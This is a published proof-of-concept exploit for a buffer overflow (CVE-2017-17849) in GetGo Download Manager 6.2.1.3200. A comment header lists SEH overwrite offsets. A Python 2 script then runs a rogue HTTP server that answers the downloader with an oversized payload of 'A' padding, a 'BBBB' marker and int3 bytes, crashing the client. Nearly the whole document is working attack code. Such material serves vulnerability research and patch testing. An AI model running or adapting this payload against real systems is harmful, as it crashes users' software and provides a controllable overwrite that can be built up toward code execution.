# Exploit Title: GetGo Download Manager 6.2.1.3200 - Buffer Overflow (Denial of Service) # Date: 2018-07-25 # Exploit Author: Nathu Nandwani # Website: http://nandtech.co # CVE: CVE-2017-17849 # Tested On: Windows 7 x86, Windows 10 x64 # # Details # # The downloader feature of GetGo Download Manager is vulnerable # to a buffer overflow which can cause a denial of service. # To test the proof of concept, have it executed in your machine # and let the GetGo application download 'index.html' from your # given IP. # # SEH details (Windows 7 x86): # # SEH chain of thread 00000644, item 1 # Address=0863E2C8 # SE handler=68463967 <-> 4108 offset # # SEH chain of thread 00000644, item 2 # Address=46386746 <-> 4104 offset # SE handler=*** CORRUPT ENTRY *** import socket server_ip = "0.0.0.0" server_port = 80 payload = "A" * 4104 + "BBBB" + "\xcc\xcc\xcc\xcc" + "D" * 11000 + "\r\n" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((server_ip, server_port)) sock.listen(1) print "Currently listening at " + server_ip + ":" + str(server_port) client, (client_host, client_port) = sock.accept() print "Client connected: " + client_host + ":" + str(client_port) print "" print client.recv(1000) client.send(payload) print "Sent payload" client.close() sock.close()